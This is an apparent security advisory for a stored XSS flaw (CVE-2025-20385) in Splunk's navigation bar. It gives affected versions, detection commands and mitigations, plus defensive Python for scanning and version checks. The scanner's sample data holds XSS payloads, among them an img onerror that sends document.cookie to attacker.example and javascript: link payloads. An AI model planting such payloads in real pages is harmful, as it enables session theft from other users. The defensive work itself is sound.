Platform: splunk
Component: splunk-enterprise
Fixed in (Splunk Enterprise): 10.0.2, 9.4.6, 9.3.8, 9.2.10
Fixed in (Splunk Cloud Platform): 10.1.2507.6, 10.0.2503.7, 9.3.2411.117
CVE-2025-20385 is a stored Cross-Site Scripting (XSS) vulnerability affecting Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8 and 9.2.10 (on their respective branches) and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7 and 9.3.2411.117. An attacker holding the adminallobjects role can exploit it to execute malicious JavaScript in another user's browser. The vulnerability was published on December 3, 2025, and fixes are available in the versions listed above.
This stored XSS vulnerability lets a malicious user who holds the adminallobjects role inject arbitrary JavaScript into data that Splunk Web renders in the navigation bar. The script then runs in the browser of every other user who navigates to the affected collection, inside that user's session. An attacker can use it to steal session cookies, redirect users to phishing sites, or deface the Splunk interface. The attacker already holds a highly privileged role; what the vulnerability adds is code execution in other users' sessions, so a single malicious or compromised administrator can act with other users' permissions and reach data and controls that were not granted to that account. Successful exploitation can therefore lead to unauthorized data access and modification, affecting the integrity and confidentiality of Splunk data.
CVE-2025-20385 is not listed in the CISA KEV catalog. No public proof-of-concept exploit is known, but stored XSS payloads are simple to construct, so one may appear. The low CVSS score reflects that exploitation requires the adminallobjects role, which limits the attack surface to already privileged users. The vulnerability was publicly disclosed on December 3, 2025.
Organizations that rely on Splunk Enterprise for security monitoring and incident response are the most exposed, because the people who view the Splunk interface (analysts and administrators) are the targets. Environments where the adminallobjects role is broadly assigned, or where users otherwise hold excessive Splunk privileges, face a higher probability of exploitation, as do shared or multi-tenant deployments in which several parties hold that role.
• linux / server: Splunk does not log what a user's browser executes, so server-side logs will not show "JavaScript execution attempts"; look for the stored payload and for who wrote it instead. journalctl -u splunkd only returns service-level messages (and the systemd unit is normally named Splunkd); splunkd's own logs are under $SPLUNK_HOME/var/log/splunk/, where web_access.log records the HTTP requests, including the POSTs that save UI objects, together with the requesting user. Search the on-disk app configuration for script tags or javascript: URIs (case-insensitive, listing matching files):
grep -rEil '<script|javascript:' "$SPLUNK_HOME/etc/apps"
• generic web: Monitor Splunk Web for unexpected behaviour or redirects. A HEAD request that only prints the Content-Type header (curl -I) cannot reveal an injected payload, so fetch the navigation definitions through the REST API and search their body. The account used must be allowed to read them; -k disables certificate verification and should only be used against a known host:
curl -sk -u admin:'<password>' "https://splunk_server:8089/servicesNS/-/-/data/ui/nav?output_mode=json" | grep -iE '<script|javascript:'
• windows / supply-chain: Scheduled tasks and PowerShell scripts are not on this vulnerability's attack path (the payload is stored in Splunk and runs in a browser), so the scheduled-task review below is general hygiene rather than detection for this CVE:
Get-ScheduledTask | Where-Object {$_.TaskName -like "*splunk*"}
For the payload itself, run the equivalent of the Linux search over the installation directory (set SPLUNK_HOME, or substitute the install path, typically C:\Program Files\Splunk):
Get-ChildItem "$env:SPLUNK_HOME\etc\apps" -Recurse -Include *.xml,*.conf | Select-String -Pattern '<script|javascript:'
Disclosure: December 3, 2025
Patch: available in the fixed versions listed above
Exploit status: no confirmed reports of active exploitation; not in the CISA KEV catalog
EPSS: 0.05% (14th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2025-20385 is to upgrade Splunk Enterprise to 10.0.2, 9.4.6, 9.3.8 or 9.2.10 (or later on the same branch), or Splunk Cloud Platform to 10.1.2507.6, 10.0.2503.7 or 9.3.2411.117. If an immediate upgrade is not possible, restrict the adminallobjects role to a small set of trusted users and review who currently holds it. A WAF rule is of limited use against stored XSS, because the payload is written once through a legitimate, authenticated request and is served by Splunk itself afterwards; instead, review the collection names, descriptions and navigation entries that already exist and restrict which HTML tags and attributes they may contain. After upgrading, confirm the fix on a non-production instance: as a user holding adminallobjects, store a harmless test payload (for example a script tag that only writes to the browser console) in a collection's navigation bar, open it as a second user, and verify that it is rendered as inert text rather than executed; remove the test object afterwards.
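The detection commands above and the verification step in the mitigation both reduce to two checks: find stored values that a renderer would turn into running script, and make sure the renderer neutralises them. The following is an added example written for this page, not Splunk code and not part of the original advisory. It assumes the stored data that reaches the navigation bar consists of collection labels, descriptions and navigation XML (an assumption about where the page's "collection" data lives), and the objects in SAMPLE_OBJECTS are constructed rather than captured from a real instance.

```python
"""Scan stored Splunk UI objects for stored-XSS indicators and show the
output handling that neutralises them.

Added example for this page; not Splunk code and not from the original
advisory. The object layout (label / description / nav_xml) and the
sample objects are constructed assumptions.
"""
import html
import re
from typing import Dict, List, Optional

# Strings a browser turns into running script if a renderer inserts them
# into HTML unescaped. Case-insensitive because HTML tags/attributes are.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "active_tag": re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
}


def find_indicators(value: str) -> List[str]:
    """Indicator names present in value. The entity-decoded text is checked
    too, so '&#106;avascript:' style encoding is reported as well."""
    raw = [name for name, p in XSS_PATTERNS.items() if p.search(value)]
    decoded = html.unescape(value)
    encoded_only = [name + " (entity-encoded)" for name, p in XSS_PATTERNS.items()
                    if name not in raw and p.search(decoded)]
    return raw + encoded_only


def scan_objects(objects: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Scan every string field of every object; one finding per indicator."""
    findings = []
    for obj in objects:
        for field, value in obj.items():
            if field == "id":
                continue
            for indicator in find_indicators(value):
                findings.append({"id": obj["id"], "field": field, "indicator": indicator})
    return findings


def escape_text(value: str) -> str:
    """Correct handling for a label rendered as HTML text or inside a quoted
    attribute: entity-encode & < > " and ' so markup becomes inert text."""
    return html.escape(value, quote=True)


def sanitize_href(url: str) -> Optional[str]:
    """Escaping is not enough for a link target: 'javascript:' survives
    html.escape untouched. Allow only http(s) URLs or site-relative paths
    and return None for everything else (data:, javascript:, //host)."""
    decoded = html.unescape(url)
    # Browsers strip tab/newline and leading whitespace inside the scheme,
    # so "java\tscript:" must be compared with those characters removed.
    cleaned = re.sub(r"[\x00-\x20]", "", decoded)
    if cleaned.lower().startswith(("http://", "https://")):
        return decoded.strip()
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return decoded.strip()
    return None


# Constructed sample data, not captured from a real Splunk instance.
SAMPLE_OBJECTS = [
    {"id": "fw", "label": "Firewall overview",
     "description": "Daily firewall summary",
     "nav_xml": '<nav><collection label="Firewall"><view name="fw_daily"/></collection></nav>'},
    {"id": "fin",
     "label": 'Finance<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
     "description": "Quarter close", "nav_xml": "<nav/>"},
    {"id": "links", "label": "Links", "description": "",
     "nav_xml": '<nav><a href="javascript:alert(document.domain)">Help</a></nav>'},
    {"id": "evasive", "label": "Ops", "description": "&#106;avascript:alert(1)",
     "nav_xml": "<nav/>"},
]

if __name__ == "__main__":
    for f in scan_objects(SAMPLE_OBJECTS):
        print(f"{f['id']}: {f['field']} -> {f['indicator']}")
    print(escape_text(SAMPLE_OBJECTS[1]["label"]))
    print(sanitize_href("javascript:alert(1)"), sanitize_href("/app/search/search"))
```

The scanner is deliberately noisy (it also flags an escaped or entity-encoded payload) because its job is to surface every write attempt for a human to review; escape_text and sanitize_href are the two different fixes a renderer needs, one for text and attribute values and a stricter allowlist for link targets, where escaping alone leaves a javascript: URI intact.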
Upgrade Splunk Enterprise to version 10.0.2, 9.4.6, 9.3.8, 9.2.10 or later. For Splunk Cloud Platform, upgrade to version 10.1.2507.6, 10.0.2503.7 or 9.3.2411.117 or later. This fixes the stored XSS vulnerability in the navigation bar.
CVE-2025-20385 is a stored Cross-Site Scripting (XSS) vulnerability in Splunk Enterprise before 10.0.2, 9.4.6, 9.3.8 and 9.2.10 (and in Splunk Cloud Platform before 10.1.2507.6, 10.0.2503.7 and 9.3.2411.117) that allows a user with the adminallobjects role to execute JavaScript in other users' browsers.
You are affected if you run Splunk Enterprise below 10.0.2, 9.4.6, 9.3.8 or 9.2.10 on the corresponding branch, or Splunk Cloud Platform below 10.1.2507.6, 10.0.2503.7 or 9.3.2411.117, and have users who hold the adminallobjects role.
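Because the fix is branch-specific (a 9.4.x host is only safe at 9.4.6 or later, not because 10.0.2 exists), checking an inventory by hand is error-prone. The following is an added example written for this page, not a Splunk tool. It assumes the usual Splunk numbering in which the last numeric component is the patch level and everything before it names the branch (10.0.x, 9.4.x, ... for Splunk Enterprise; 10.1.2507.x, 10.0.2503.x, 9.3.2411.x for Splunk Cloud Platform), and it reports a version on a branch the page lists no fix for as unlisted rather than guessing; the sample inventory is constructed.

```python
"""Classify Splunk versions against the fixed versions this page lists
for CVE-2025-20385.

Added example for this page; not a Splunk tool. Branch = all components
before the last one (an assumption about Splunk's numbering).
"""
import re
from typing import Tuple

FIXED_ENTERPRISE = ("10.0.2", "9.4.6", "9.3.8", "9.2.10")
FIXED_CLOUD = ("10.1.2507.6", "10.0.2503.7", "9.3.2411.117")


def parse_version(text: str) -> Tuple[int, ...]:
    """Extract the dotted version from '9.4.5' or from the output of
    `splunk version`, e.g. 'Splunk 9.4.5 (build 1a2b3c)'."""
    match = re.search(r"\d+(?:\.\d+)+", text)
    if match is None:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def classify(version: str, product: str) -> str:
    """Return 'affected', 'fixed' or 'unlisted branch'.

    product is 'enterprise' or 'cloud'. The two lists differ in length as
    well as content, so a Cloud version checked against the Enterprise
    list (or vice versa) comes back 'unlisted branch', not a wrong answer."""
    fixed_list = {"enterprise": FIXED_ENTERPRISE, "cloud": FIXED_CLOUD}[product]
    parsed = parse_version(version)
    for fixed in fixed_list:
        fixed_parsed = parse_version(fixed)
        # Same branch: same length and identical components before the patch level.
        if len(fixed_parsed) == len(parsed) and fixed_parsed[:-1] == parsed[:-1]:
            return "affected" if parsed[-1] < fixed_parsed[-1] else "fixed"
    return "unlisted branch"


if __name__ == "__main__":
    # Constructed sample inventory, not data from a real deployment.
    inventory = [
        ("search-head-1", "Splunk 9.4.5 (build 1a2b3c)", "enterprise"),
        ("indexer-2", "10.0.2", "enterprise"),
        ("legacy-hf", "9.1.7", "enterprise"),
        ("cloud-stack", "9.3.2411.116", "cloud"),
    ]
    for host, version, product in inventory:
        print(f"{host:14} {version:32} {classify(version, product)}")
```

An "unlisted branch" result means the page gives no fixed version for that branch; treat such hosts as needing a manual check against the vendor advisory rather than as safe.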
Upgrade Splunk Enterprise to 10.0.2, 9.4.6, 9.3.8 or 9.2.10 (or later on the same branch), or Splunk Cloud Platform to 10.1.2507.6, 10.0.2503.7 or 9.3.2411.117. Restrict the adminallobjects role if an immediate upgrade is not possible.
There are currently no confirmed reports of active exploitation, but stored XSS payloads are simple to construct, so the vulnerability may be targeted in the future.
Refer to the official Splunk security advisory for CVE-2025-20385 on the Splunk website.